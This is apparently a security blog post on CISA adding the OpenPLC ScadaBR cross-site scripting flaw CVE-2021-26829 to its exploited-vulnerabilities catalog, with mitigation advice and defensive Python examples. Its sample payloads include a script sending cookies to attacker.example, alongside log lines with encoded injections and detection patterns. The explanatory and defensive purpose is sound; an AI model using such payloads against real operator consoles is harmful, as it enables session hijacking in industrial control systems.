---
title: "CISA Adds Actively Exploited OpenPLC ScadaBR Flaw to KEV Catalog"
short_title: "CISA adds OpenPLC ScadaBR flaw to KEV Catalog"
description: "CISA adds CVE-2021-26829, an actively exploited OpenPLC ScadaBR XSS vulnerability, to its KEV Catalog. Learn about the risks and mitigation steps."
author: "Tom"
date: 2025-11-28
categories: [Cybersecurity, Vulnerabilities]
tags: [cve-2021-26829, openplc, scadabr, xss, vulnerability]
score: 0.85
cve_ids: [CVE-2021-26829]
---
TL;DR
CISA has added CVE-2021-26829, a Cross-site Scripting (XSS) vulnerability in OpenPLC ScadaBR, to its Known Exploited Vulnerabilities (KEV) Catalog on the basis of evidence that it is being exploited in the wild. ScadaBR is the web-based SCADA/HMI front end used with OpenPLC, so the script an attacker injects runs in an operator's browser session against an industrial control system (ICS). Federal Civilian Executive Branch (FCEB) agencies must remediate by the BOD 22-01 due date; any other organization running ScadaBR should treat it with the same priority.
Main Content
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has updated its Known Exploited Vulnerabilities (KEV) Catalog to include CVE-2021-26829, a Cross-site Scripting (XSS) vulnerability in OpenPLC ScadaBR.[^1] Entries are added to the catalog only on evidence of active exploitation, so the listing means attackers are using this flaw now, not merely that it could be used.[^2]
XSS is often underrated because the injected script runs in a browser rather than on the server. In an HMI that is precisely the problem: the script executes with the privileges of whichever operator or administrator views the tainted page, can read what they see, submit the forms they can submit, and carry their authenticated session to the SCADA back end. Where ScadaBR sits on an operational technology (OT) network that is also reachable from the enterprise side, a single injected string puts both networks within reach.
---
Key Points
- CVE-2021-26829 is an XSS vulnerability in OpenPLC ScadaBR, the open-source web-based SCADA/HMI front end deployed alongside OpenPLC for industrial automation.
- CISA added the vulnerability to its KEV Catalog because of evidence of active exploitation.[^2]
- Binding Operational Directive (BOD) 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate catalog entries by the due date listed in the entry.[^3]
- BOD 22-01 binds only FCEB agencies, but CISA's standing recommendation is that every organization remediate KEV entries as a priority, and an exposed web HMI on an OT network deserves the same urgency.
---
Technical Details
CVE-2021-26829 is a Cross-site Scripting (XSS) vulnerability: attacker-controlled input reaches a ScadaBR web page without being HTML-encoded, so the browser of whoever views that page treats it as markup and executes any script it contains. Exploitation therefore needs a victim, typically an operator or administrator with an authenticated ScadaBR session, to load the affected page. Once that happens the injected script can:
- Steal the session cookie (if it lacks the HttpOnly flag) or harvest credentials by rewriting the login form in place.
- Redirect the user to an attacker-controlled site, for example a credential-harvesting copy of the HMI login page.
- Run arbitrary script in the victim's browser with the victim's ScadaBR privileges, which includes issuing requests to the HMI on their behalf.
The last point is what makes XSS dangerous in an HMI. The browser is the console through which operators supervise the process, so a script acting as the operator can alter what the operator sees or issue the same commands the operator could. That is a route to operational disruption and to further access into critical infrastructure, not a cosmetic web bug.
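To make the mechanism concrete, the following Python (an added example, not code from ScadaBR, OpenPLC or the CVE advisory) shows the two halves of an XSS bug: a page that writes a stored, user-controlled setting into HTML unencoded, beside the same page with output encoding, and a small HTML parser that reports what a browser would execute in each case. The payloads, the page template and the setting name are constructed for this example; nothing here reproduces the real ScadaBR page or the specific injection used in the wild.

```python
import html
from html.parser import HTMLParser

# Constructed payloads for this example: strings an attacker might save into a
# user-editable HMI setting (the field name "system_name" is hypothetical).
PAYLOADS = [
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    '<img src=x onerror="alert(document.cookie)">',
]

# Minimal stand-in for a settings page that echoes the stored value back.
PAGE = "<html><body><h1>Settings</h1><p>System name: {name}</p></body></html>"


def render_unsafe(name: str) -> str:
    """Stored-XSS pattern: the stored value is written into the page as-is."""
    return PAGE.format(name=name)


def render_safe(name: str) -> str:
    """Hardened form: HTML-encode at output time. quote=True also encodes
    quotes, so the same value is also safe inside an attribute."""
    return PAGE.format(name=html.escape(name, quote=True))


class ActiveContentFinder(HTMLParser):
    """Counts <script> elements and inline on* handlers, i.e. the things a
    browser would execute when it parses the document."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts = 0
        self.handlers: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1
        for attr, _value in attrs:  # HTMLParser lower-cases attribute names
            if attr.startswith("on"):
                self.handlers.append(f"{tag}@{attr}")


def active_content(doc: str) -> tuple[int, list[str]]:
    """Return (number of script elements, list of 'tag@handler') found in doc."""
    finder = ActiveContentFinder()
    finder.feed(doc)
    finder.close()
    return finder.scripts, finder.handlers


if __name__ == "__main__":
    for payload in PAYLOADS:
        print("unsafe:", active_content(render_unsafe(payload)))
        print("safe:  ", active_content(render_safe(payload)))
```

The unencoded render yields one script element for the first payload and an `img@onerror` handler for the second; the encoded render yields neither, because `&lt;script&gt;` is text to the parser, exactly as it is to a browser. Encoding at the point of output is the fix for the bug class; a CSP header and HttpOnly cookies reduce what an attacker gains if a page is missed.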
---
Impact Assessment
Inclusion in the KEV Catalog is a statement about exploitation, not about a severity score: CISA lists a vulnerability when it has evidence that attackers are using it, so an XSS bug with a moderate base score can sit next to critical remote code execution flaws. For defenders the practical meaning is the same in either case: someone is exploiting this now. Organizations that leave CVE-2021-26829 unaddressed risk:
- Session hijacking or stolen operator credentials, followed by actions taken in the HMI under that identity.
- Operational disruption where the HMI drives a live process.
- Non-compliance with BOD 22-01, for FCEB agencies.
ScadaBR is deployed in manufacturing, energy and utilities, so the exposure reaches well beyond federal systems to private operators worldwide.
---
Mitigation Steps
To mitigate the risks associated with CVE-2021-26829, organizations should:
1. Patch or Remove: Apply the latest OpenPLC ScadaBR updates for the version you run. If no fixed release is available for your deployment, the catalog's standard required action applies: apply mitigations per vendor instructions, or discontinue use of the product if none are available. At a minimum, take an unpatched ScadaBR instance off any network reachable from outside the OT enclave.
2. Reduce Exposure: Put the HMI behind an authenticating reverse proxy, restrict it to the operator workstations that need it, and keep operators from browsing other sites in the same browser profile they use for the HMI.
3. Monitor for Exploitation: Review web server access logs for script-injection patterns in request parameters and alert on them. An IDS detects; only an inline IPS or WAF in front of the HMI can block. Stored payloads submitted in POST bodies do not appear in standard access logs, so application-level logging of configuration changes is needed as well.
4. Implement Security Best Practices:
- Enforce least privilege for ScadaBR users, so a hijacked operator session cannot reconfigure the system.
- Send a Content Security Policy (CSP) header that disallows inline script, and mark session cookies HttpOnly and Secure. For a legacy Java web application this is usually done at the reverse proxy, and a strict CSP may break pages that rely on inline scripts, so roll it out as Content-Security-Policy-Report-Only first.
- Conduct regular vulnerability scans and penetration tests that include the HMI, not only the enterprise network.
For FCEB agencies, compliance with BOD 22-01 is mandatory; all other organizations are strongly encouraged to follow the same schedule.
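Steps 3 and 4 above are easier to act on with something concrete. The following Python, added here as an example and not code from CISA, OpenPLC or the ScadaBR project, does two things: it scans combined-format web access log lines for URL-encoded script-injection patterns in request targets, and it audits a response's Content-Security-Policy and Set-Cookie headers for the weaknesses that turn an XSS bug into session theft. The log lines, hosts, user names, timestamps and the /ScadaBR/ paths are constructed for this example and are not claimed to be the endpoint affected by the CVE; the header sets at the bottom are likewise assumed.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache/Tomcat "combined"-format access log lines for this example.
# Hosts, users, timestamps and URL paths are made up; the paths under /ScadaBR/
# are hypothetical and are not claimed to be the endpoint affected by the CVE.
SAMPLE_LOG = """\
10.0.0.5 - operator [28/Nov/2025:10:01:12 +0000] "GET /ScadaBR/watch_list.shtm HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [28/Nov/2025:10:02:40 +0000] "GET /ScadaBR/login.htm?error=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048 "-" "python-requests/2.31"
10.0.0.9 - admin [28/Nov/2025:10:03:01 +0000] "POST /ScadaBR/settings.shtm HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - operator [28/Nov/2025:10:04:33 +0000] "GET /ScadaBR/point_details.shtm?dpid=12 HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
10.0.0.9 - - [28/Nov/2025:10:05:17 +0000] "GET /ScadaBR/events.shtm?msg=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.cookie)%3E HTTP/1.1" 200 3000 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators of script injection in a request target. Deliberately broad;
# tune against your own traffic before alerting on them.
XSS_INDICATORS = {
    "script-tag": re.compile(r"<\s*script\b", re.I),
    "event-handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript-uri": re.compile(r"javascript\s*:", re.I),
    "active-element": re.compile(r"<\s*(img|svg|iframe|object|embed)\b", re.I),
}


def decode_target(target: str) -> str:
    """URL-decode twice so double-encoded payloads (%253C -> %3C -> <) are seen."""
    return unquote_plus(unquote_plus(target))


def scan_access_log(text: str) -> list[dict]:
    """Return one record per request whose decoded target matches an indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        decoded = decode_target(m["target"])
        matched = [name for name, rx in XSS_INDICATORS.items() if rx.search(decoded)]
        if matched:
            hits.append({"ip": m["ip"], "user": m["user"],
                         "target": decoded, "indicators": matched})
    return hits


def audit_response_headers(headers: dict) -> list[str]:
    """Flag response-header weaknesses that make an XSS bug easier to exploit."""
    findings = []
    csp = headers.get("Content-Security-Policy")
    if csp is None:
        findings.append("no Content-Security-Policy header")
    else:
        directives = {}
        for directive in csp.split(";"):
            parts = directive.split()
            if parts:
                directives[parts[0].lower()] = [p.lower() for p in parts[1:]]
        # script-src falls back to default-src when absent, as browsers do.
        src = directives.get("script-src", directives.get("default-src"))
        if src is None:
            findings.append("CSP has neither script-src nor default-src")
        else:
            if "'unsafe-inline'" in src:
                findings.append("script-src allows 'unsafe-inline'")
            if "*" in src:
                findings.append("script-src allows any origin (*)")
    cookie = headers.get("Set-Cookie", "")
    if cookie:
        # Attributes follow the first "name=value" pair, separated by ";".
        flags = {p.strip().split("=")[0].lower() for p in cookie.split(";")[1:]}
        if "httponly" not in flags:
            findings.append("session cookie lacks HttpOnly")
        if "secure" not in flags:
            findings.append("session cookie lacks Secure")
    return findings


# Constructed header sets (assumed values, not captured from a real server).
WEAK_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self' 'unsafe-inline'",
    "Set-Cookie": "JSESSIONID=abc123; Path=/ScadaBR",
}
HARDENED_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
    "Set-Cookie": "JSESSIONID=abc123; Path=/ScadaBR; HttpOnly; Secure; SameSite=Strict",
}

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
    print("weak:", audit_response_headers(WEAK_HEADERS))
    print("hardened:", audit_response_headers(HARDENED_HEADERS))
```

Two of the five constructed lines are flagged, both from the same source address; the POST to the settings page is not, because its body is not in the access log, which is the gap application-level logging has to cover. HttpOnly stops the injected script from reading the cookie but not from acting inside the victim's session, so the header audit is a second layer on top of output encoding, not a substitute for the patch.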
---
Conclusion
The addition of CVE-2021-26829 to CISA's KEV Catalog serves as a critical reminder of the ongoing threats posed by XSS vulnerabilities, particularly in industrial control systems. Organizations must act swiftly to patch this flaw and implement robust security measures to protect against exploitation. Proactive vulnerability management is essential to safeguarding both federal and private networks from evolving cyber threats.
References
[^1]: CISA. "[CISA Adds One Known Exploited Vulnerability to Catalog](https://www.cisa.gov/news-events/alerts/2025/11/28/cisa-adds-one-known-exploited-vulnerability-catalog)". Retrieved 2025-11-28.
[^2]: CISA. "[Known Exploited Vulnerabilities Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)". Retrieved 2025-11-28.
[^3]: CISA. "[Binding Operational Directive 22-01](https://www.cisa.gov/binding-operational-directive-22-01)". Retrieved 2025-11-28.